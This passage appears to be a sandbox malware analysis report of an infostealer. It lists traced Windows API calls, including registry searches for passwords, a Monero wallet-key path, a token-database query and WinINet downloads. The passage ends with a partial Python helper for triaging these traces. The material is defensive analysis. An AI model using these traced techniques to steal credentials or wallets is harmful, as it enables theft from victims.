                            • lstrcat.KERNEL32(00000000,00000000), ref: 003B76D3
                            • lstrcat.KERNEL32(00000000,003D1808), ref: 003B76ED
                            • task.LIBCPMTD ref: 003B76FB
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            • Opcode ID: 688366280e543173653ff98a44ce885d2fdbfbe997a798896d40fe845111ef66
                            • Instruction ID: 9a885ba8284899ad53684a27fc9360f6c434bf820ca866376cc0e5f5fd5da9c0
                            • Opcode Fuzzy Hash: 688366280e543173653ff98a44ce885d2fdbfbe997a798896d40fe845111ef66
                            • Instruction Fuzzy Hash: 6D3150B2D00109EFCB06EBA4DC45EFE7778FB94305B144518F206EB690DB38A94ADB52
                            APIs
                            • memset.MSVCRT ref: 003B7314
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003B733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003B73B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003B740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 003B7452
                            • HeapFree.KERNEL32(00000000), ref: 003B7459
                            • task.LIBCPMTD ref: 003B7555
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            • Opcode ID: 74ffb8def664070034f0b2d34a8f65d51592d86827cdb1d798a57db971168127
                            • Instruction ID: eb87bc02d6c51890a1fba32c41175109ba454f1f5c0e8cb718ae2d4be2a6b1c7
                            • Opcode Fuzzy Hash: 74ffb8def664070034f0b2d34a8f65d51592d86827cdb1d798a57db971168127
                            • Instruction Fuzzy Hash: EA613AB580015C9BDB25DB50CC41BD9B7BCFF44344F0081E9E649AA541DBB06BC9CFA1
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                              • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                            • InternetOpenA.WININET(003D0DF7,00000001,00000000,00000000,00000000), ref: 003B610F
                            • StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B6147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003B618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003B61B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 003B61DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003B620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 003B6249
                            • InternetCloseHandle.WININET(?), ref: 003B6253
                            • InternetCloseHandle.WININET(00000000), ref: 003B6260
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 50c155ab36c4999e7e6e5dbf1be053508aa9d356cfb308af49be3c832f65282c
                            • Instruction ID: 4c847b5f92547aa9aa4c472592747f4427b2d474b6c25edaf03a9891157dcf63
                            • Opcode Fuzzy Hash: 50c155ab36c4999e7e6e5dbf1be053508aa9d356cfb308af49be3c832f65282c
                            • Instruction Fuzzy Hash: 685151B1900218ABEF21DF50DC46FEE77B8EB44705F104498A609AB181DB786E89DF56
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                            • lstrlen.KERNEL32(00000000), ref: 003BBC9F
                              • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 003BBCCD
                            • lstrlen.KERNEL32(00000000), ref: 003BBDA5
                            • lstrlen.KERNEL32(00000000), ref: 003BBDB9
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 8490720ec5494e58dad2468ed78b6902623de664aa42ef0feaf44a688d966781
                            • Instruction ID: 8b349ba6630c5a84d4919631cb095fd2e3d384b74774e7fe4c4b960573f107c5
                            • Opcode Fuzzy Hash: 8490720ec5494e58dad2468ed78b6902623de664aa42ef0feaf44a688d966781
                            • Instruction Fuzzy Hash: 29B14F7291060CABCB16EBA0DC96FEE7738AF14304F40411DF506EA191EF346E49DBA2
                            APIs
                            Strings
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: f9afa345c12018d2eae8d1ec2b603b5f23400d18394b99d0ac7edb34d965273b
                            • Instruction ID: a79ac0625bf06b943f8941eb23a973f99bbf764d110ce332375c1318bccb9d38
                            • Opcode Fuzzy Hash: f9afa345c12018d2eae8d1ec2b603b5f23400d18394b99d0ac7edb34d965273b
                            • Instruction Fuzzy Hash: 70F03A70905209EFD344AFE0A90AF3C7B74FB15702F040198E609C6290D6786A42EBD7
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003B4FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003B4FD1
                            • InternetOpenA.WININET(003D0DDF,00000000,00000000,00000000,00000000), ref: 003B4FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 003B5011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 003B5041
                            • InternetCloseHandle.WININET(?), ref: 003B50B9
                            • InternetCloseHandle.WININET(?), ref: 003B50C6
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: 5d75d00cb2f136057a69f090ea651992e8fb4f13ccfceec23e2734b0ef4a2cf7
                            • Instruction ID: bb6e9930901096d5d6535788ff3f0029f44c2ef69ed8ae39b9b69aa5b6796ac3
                            • Opcode Fuzzy Hash: 5d75d00cb2f136057a69f090ea651992e8fb4f13ccfceec23e2734b0ef4a2cf7
                            • Instruction Fuzzy Hash: 3431E6F4A00218ABDB20DF54DC85BEDB7B4EB48704F1081D9EB09A7281D7746E85DF99
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0108E3E0,00000000,?,003D0E2C,00000000,?,00000000), ref: 003C8130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C8137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003C8158
                            • wsprintfA.USER32 ref: 003C81AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2922868504-3474575989
                            • Opcode ID: 7c222c684260b151f3e4f43421d56f02b2afd62acf0ee7c741a1f4eeb7b7dc48
                            • Instruction ID: 29721bd04ae949e26c84d7c6cc42b4900d7e71cb4257753559b294a54e916ff3
                            • Opcode Fuzzy Hash: 7c222c684260b151f3e4f43421d56f02b2afd62acf0ee7c741a1f4eeb7b7dc48
                            • Instruction Fuzzy Hash: ED214AB1E44208ABDB00DFD4DC49FAEB7B8FB44B10F104619F605FB280D7B869058BA6
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003C8426
                            • wsprintfA.USER32 ref: 003C8459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003C847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C8499
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                            • RegQueryValueExA.ADVAPI32(00000000,0108E2D8,00000000,000F003F,?,00000400), ref: 003C84EC
                            • lstrlen.KERNEL32(?), ref: 003C8501
                            • RegQueryValueExA.ADVAPI32(00000000,0108E260,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003D0B34), ref: 003C8599
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C8608
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: 817c8640f7a3461a7dc5717c3fc23fb243e9ec87061811771982600a308b6b4e
                            • Instruction ID: c70d5beb1f4cedb2f641c68381e998d21180b193c8f935f36136821ecee6ad10
                            • Opcode Fuzzy Hash: 817c8640f7a3461a7dc5717c3fc23fb243e9ec87061811771982600a308b6b4e
                            • Instruction Fuzzy Hash: 6F2107B190021CABDB24DB54DC85FE9B3B8FB48700F00C199E609A6140DF75AE85CFD5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C76A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C76AB
                            • RegOpenKeyExA.ADVAPI32(80000002,0107C3C8,00000000,00020119,00000000), ref: 003C76DD
                            • RegQueryValueExA.ADVAPI32(00000000,0108E188,00000000,00000000,?,000000FF), ref: 003C76FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C7708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: b497db51f70792eaa88b22fe8c34f5073883920e04588d228c3dfb8609a54ea2
                            • Instruction ID: ea2b0a26e58897f281ae0e947e730695a64ec4350a0d508d08704cb289aa3262
                            • Opcode Fuzzy Hash: b497db51f70792eaa88b22fe8c34f5073883920e04588d228c3dfb8609a54ea2
                            • Instruction Fuzzy Hash: 4E0144F5A44208BBD700DBE4DC49F79B7B8EB58701F104458FE08D7291D6B49904DF52
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C773B
                            • RegOpenKeyExA.ADVAPI32(80000002,0107C3C8,00000000,00020119,003C76B9), ref: 003C775B
                            • RegQueryValueExA.ADVAPI32(003C76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 003C777A
                            • RegCloseKey.ADVAPI32(003C76B9), ref: 003C7784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 53a41c90866e816f83022be59d95ef1cf843d63afd6d6fbff17b90e5bc52a9a2
                            • Instruction ID: d1c3a48c1d02e7ed2676f8490da3da317c29b4db69d1c358c65fd46f3afc253e
                            • Opcode Fuzzy Hash: 53a41c90866e816f83022be59d95ef1cf843d63afd6d6fbff17b90e5bc52a9a2
                            • Instruction Fuzzy Hash: B801F4F5A40308BBD700DBE4DC49FBEB7B8EB58705F104559FA09E7281D6B46A04DB52
                            APIs
                            • CreateFileA.KERNEL32(:<,80000000,00000003,00000000,00000003,00000080,00000000,?,003C3AEE,?), ref: 003C92FC
                            • GetFileSizeEx.KERNEL32(000000FF,:<), ref: 003C9319
                            • CloseHandle.KERNEL32(000000FF), ref: 003C9327
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :<$:<
                            • API String ID: 1378416451-3602519871
                            • Opcode ID: bf632e79d7803aa5d97ed97156a55f01e0fbf6d4586aee1ff320fc3b220a7b61
                            • Instruction ID: c72d0dcd150087e7a7636330a3ebcbc2f555d59894d98e752ce3a3a416872c1b
                            • Opcode Fuzzy Hash: bf632e79d7803aa5d97ed97156a55f01e0fbf6d4586aee1ff320fc3b220a7b61
                            • Instruction Fuzzy Hash: CDF06978E00208ABDB10DBA0DC48FAE77B9EB58310F118658A615EB2C0E674AA019F41
                            APIs
                            • memset.MSVCRT ref: 003C40D5
                            • RegOpenKeyExA.ADVAPI32(80000001,0108DCC0,00000000,00020119,?), ref: 003C40F4
                            • RegQueryValueExA.ADVAPI32(?,0108E5D8,00000000,00000000,00000000,000000FF), ref: 003C4118
                            • RegCloseKey.ADVAPI32(?), ref: 003C4122
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4147
                            • lstrcat.KERNEL32(?,0108E518), ref: 003C415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: 59bc8e92497ae53bbf46cce14300a90cb1ee30a8718e8adf6a06eb7cab512513
                            • Instruction ID: e9c00bd7f9cae08cd9909de0afa4d0a4de52494c3971178b5d0ebcd673d1bd51
                            • Opcode Fuzzy Hash: 59bc8e92497ae53bbf46cce14300a90cb1ee30a8718e8adf6a06eb7cab512513
                            • Instruction Fuzzy Hash: 7D41C9B69001086BDB25EBA0DC56FFD733DA798300F40455CB719DA181EA755B8CCBA3
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                            • LocalFree.KERNEL32(003B148F), ref: 003B9A90
                            • CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 859882abf5eb2d799d021389ce371f4b464c155afba2859eb5ba792637f72558
                            • Instruction ID: 773ac2a541669889e8f121242a5ee72838f2d82e3db1c1fa7db2aed3eebb0c3b
                            • Opcode Fuzzy Hash: 859882abf5eb2d799d021389ce371f4b464c155afba2859eb5ba792637f72558
                            • Instruction Fuzzy Hash: D3314AB4A00209EFDB11CF94C885FEE77B8FF48344F108159EA05A7290D778A945CFA1
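The "APIs" listings above (the WinINet fetch at 003B4FCA..003B50C6, the RegEnumKeyExA loop at 003C8426, the CurrentBuildNumber query at 003C775B, the CreateFileA/ReadFile reader at 003B99EC) show raw stack words where an analyst wants named constants. The following Python is an added triage helper, not part of the Joe Sandbox report and not Stealc code: it parses bullet lines in exactly the format printed on this page, decodes the HKEY roots, registry access masks, CSIDL folder ids and WinINet/CreateFile flags that appear as hex, and tags each function with a coarse capability. The capability vocabulary is this script's own assumption (Joe Sandbox has no such field), as is the reading of the two words beside GetProcessHeap as the size argument of the RtlAllocateHeap call that follows it. The sample input is copied from the listings above.

```python
import re

# Joe Sandbox prints one bullet per traced call, "• Name.MODULE(arg,...), ref: ADDR". Parentheses
# are absent for variadic calls such as wsprintfA; calls inside a callee carry the prefix "Part of
# subcall function ADDR:"; an argument is an 8-hex-digit stack word, "?" or a resolved string.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_READ, KEY_WOW64_64KEY = 0x20019, 0x0100
CSIDL = {0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY",
         0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}
INET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
              0x00800000: "INTERNET_FLAG_SECURE", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
# Coarse capability vocabulary: this script's own assumption, not a Joe Sandbox field.
CAPABILITIES = {
    "internetopena": "network: WinINet HTTP client", "internetopenurla": "network: WinINet HTTP client",
    "internetreadfile": "network: WinINet HTTP client",
    "regenumkeyexa": "registry: enumerate subkeys", "regqueryvalueexa": "registry: read values",
    "globalmemorystatusex": "host fingerprint: RAM size",
    "createfilea": "file: open", "readfile": "file: read contents", "getfilesizeex": "file: size check",
    "findfirstfilea": "file: directory enumeration", "getfileattributesa": "file: existence check",
    "shgetfolderpatha": "file: resolve user profile folders",
}

def parse_arg(token):
    token = token.strip()
    if token == "?":
        return None
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", token) else token

def parse_api_line(line):
    m = API_LINE.match(line)
    if not m:
        return None
    args = [parse_arg(a) for a in m.group("args").split(",")] if m.group("args") else []
    return {"name": m.group("name"), "module": m.group("module"), "args": args,
            "ref": m.group("ref"), "subcall": m.group("sub")}

def flag_names(value, table):
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)  # bits the table does not know stay visible as hex
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"

def decode(call):
    """Turn raw stack words into the Win32 constants an analyst would otherwise look up."""
    name, notes, where = call["name"].lower(), [], f'{call["name"]} @ {call["ref"]}'
    a = call["args"] + [None] * 8  # pad so short argument lists index safely
    if name.startswith("reg") and a[0] in HKEYS:
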